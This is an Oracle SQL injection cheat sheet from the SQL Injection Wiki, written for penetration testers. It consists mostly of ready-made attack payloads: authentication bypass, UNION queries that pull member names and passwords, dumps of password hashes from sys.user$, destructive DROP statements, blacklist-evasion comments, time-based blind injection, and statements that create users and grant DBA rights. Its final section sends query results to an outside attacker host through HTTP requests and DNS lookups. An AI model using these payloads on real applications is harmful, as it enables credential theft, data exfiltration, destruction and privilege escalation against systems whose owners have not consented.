The SQL Injection Wiki project aims to provide all bells and whistles about SQL Injection. It is a good reference for both seasoned web security professionals and those who are just starting. This project website is frequently updated and currently includes detailed documentation about SQL Injection attack variants for the below list of databases:

The SQL Injection Wiki is sponsored by Netsparker, an automated false positive free web vulnerability scanner. Download a free trial.

Oracle SQL Injection Cheat Sheet

 

 

Back to top

Version   SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
 SELECT version FROM v$instance; 
Current User  SELECT user FROM dual
Current Database  SELECT instance_name FROM v$instance;

Back to top

Error Based SQLi  For integer inputs : (utl_inaddr.get_host_address((select user from DUAL)))
 For string inputs   : ' + (utl_inaddr.get_host_address((select user from DUAL))) + '

 The attacks above should throw conversion errors.
Clear SQLi Tests These tests are simply good for boolean sql injection and silent attacks.

 product.asp?id=4
 product.asp?id=5-1
 product.asp?id=4 OR 1=1

Back to top

Use this when you can not see any difference at output. Second do not use more than 30 seconds, because database API connection timeout could be easily reached.

This is just like sleep, wait for spesified time. CPU safe way to make database wait.
  • select+dbms_pipe.receive_message((chr(95)||chr(96)||chr(97))+from+dual)

Back to top

DROP sampletable;--
Username: admin'--

SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'

This is going to log you as admin user, because rest of the SQL query will be ignored.

Back to top

Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.

  • DROP/*comment*/sampletable
  • DR/**/OP/*bypass blacklisting*/sampletable


Back to top

BEGIN 
IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;

Back to top

SELECT CHR(75)||CHR(76)||CHR(77)

This will return ‘KLM’.

Back to top

With union you do SQL queries cross-table. Basically you can poison query to return records from another table.

SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members

This will combine results from both news table and members table and return all of them.

Another Example :
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

Back to top

There are some techniques for command execution.

  • Creating JAVA library
  • DBMS_SCHEDULER
  • EXTPROC
  • PL/SQL native make utility (9i only)


You can also use WebRaider, which implements the first & second techniques.


Back to top

CREATE USER user IDENTIFIED by pass;

Back to top

DROP USER user

Back to top

GRANT DBA to USER

Back to top

SELECT name FROM sys.user$ where type#=1
SELECT * FROM all_users

Back to top

SELECT name, password FROM sys.user$ where type#=1

Back to top

SELECT DISTINCT owner FROM all_tables

Back to top

  • SELECT * FROM session_privs
  • SELECT * FROM dba_role_privs
  • SELECT * FROM dba_sys_privs
  • SELECT * FROM user_tab_privs

Back to top

SELECT * FROM dba_registry

Back to top

SELECT * FROM all_tables where OWNER=’DATABASE_NAME'

Back to top

SELECT * FROM all_col_comments WHERE TABLE_NAME='TABLE'

Back to top

SYSTEM
SYSAUX

Back to top

SELECT name FROM V$DATAFILE

SELECT * FROM dba_directories

Back to top

?vulnerableParam=(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100) THEN dbms_pipe.receive_message(('xyz'),14) ELSE dbms_pipe.receive_message(('xyz'),1) END FROM dual)

{INJECTION} = You want to run the query.

If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.

Back to top

?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ sniff.php?sniff='||({INJECTION})||'') FROM DUAL)
Sniffer application will save results

?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ '||({INJECTION})||'.html') FROM DUAL)
Results will be saved in HTTP access logs

?vulnerableParam=(SELECT UTL_INADDR.get_host_addr(({INJECTION})||'.yourhost.com') FROM DUAL)
You need to sniff dns resolution requests to yourhost.com

?vulnerableParam=(SELECT SYS.DBMS_LDAP.INIT(({INJECTION})||’.yourhost.com’,80) FROM DUAL)
You need to sniff dns resolution requests to yourhost.com

{INJECTION} = You want to run the query.